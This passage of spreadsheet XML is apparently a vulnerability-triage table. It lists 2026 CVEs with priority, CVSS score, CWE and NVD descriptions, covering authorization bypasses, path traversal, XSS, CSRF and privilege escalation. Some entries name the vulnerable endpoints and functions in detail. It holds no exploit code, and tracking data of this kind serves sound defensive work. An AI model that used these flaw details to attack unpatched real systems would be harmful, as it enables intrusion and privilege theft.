      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Insufficient tenant-level authorization checks allow authenticated users to access administrative resources belonging to other tenants by specifying a valid non predictable tenant identifier.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67403</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68484</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Administrative functions do not properly verify user privileges, allowing authenticated low-privileged users to create administrator accounts and obtain elevated privileges.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68484</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>Next.js is a React framework for building full-stack web applications. From 13.4.0 until 15.5.24 and 16.3.3, Next.js applications using Pages Router or App Router without Cache Components on Windows-hosted servers do not consistently escape backslashes in route segments before constructing incremental-cache paths. In packages/next/src/shared/lib/router/utils/escape-path-delimiters.ts and packages/next/src/server/lib/incremental-cache/file-system-cache.ts, a remote request can supply encoded Windows path separators that traverse outside the intended cache root and expose private build data, including the server-reference-manifest encryption key. Disclosure of that key can enable remote code execution in the affected application. This issue is fixed in versions 15.5.24 and 16.3.3.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87613</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87613</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="R165"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S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30864</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to Reflected Cross-Site Scripting (XSS) in the dashboard revert functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30864</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79921</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>amqp091-go is a Go AMQP 0.9.1 client. Before version 1.13.0, a compromised or malicious AMQP broker can force the client to allocate resources for and process content body frames that exceed the negotiated frame_max limit. This can lead to unexpected memory consumption or application-layer denial of service (DoS), bypassing the protocol's built-in framing constraints. Version 1.13.0 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79921</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56798</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Lime Technology, Inc.'s Unraid OS version 6.12.14 and earlier allows remote attackers to escalate privileges via the Unraid authentication cookie's lax same-site policy.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56798</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14359</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Waitlist Premium plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 3.35.0. This is due to the add_user_in_waiting_list() function registered on the wp_ajax_yith_wcwtl_add_user action being missing both a capability check and a nonce verification, and using parse_str() + extract() to import attacker-controlled variables from $_POST['params'] that are then passed to wp_create_user() and $user-&gt;set_role(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator by creating a new user account and assigning it the administrator role.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14359</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21094</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in wpa_supplicant prior to SMR Sep-2026 Release 1 allows adjacent attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21094</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31936</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, users can access to unauthorized object information through the search operation. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31936</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33240</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there was a Reflected Cross-Site Scripting (XSS) vulnerability in the foreign key search criteria API. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33240</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="R174"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S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48050</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Versions prior to 26.06.1 register Go's `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication. Version 26.06.1 contains a patch. Some workarounds are available. Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc, restrict Arc's API port to known-trusted networks via firewall rules, and/or patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48050</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49050</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>apache:dolphinscheduler</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>General user can mint admin access tokens via /access-tokens
This issue affects Apache DolphinScheduler: before 3.4.2.
Users are recommended to upgrade to version 3.4.2, which fixes the issue.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49050</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53527</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.1.0 through 0.10.0 have a privilege escalation vulnerability in the user update API. An authenticated user could update their own account role and escalate privileges from a regular user, such as `viewer`, to `admin`. Exploitation requires a valid authenticated LeafWiki user account. Instances without public registration and with only trusted users are at lower practical risk. Users should update to version 0.10.1 or greater. Until a patch is available, operators should restrict account creation and ensure that only trusted users have accounts on affected LeafWiki instances. If possible, access to the user update API should be restricted to trusted users or administrators only.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53527</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53528</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
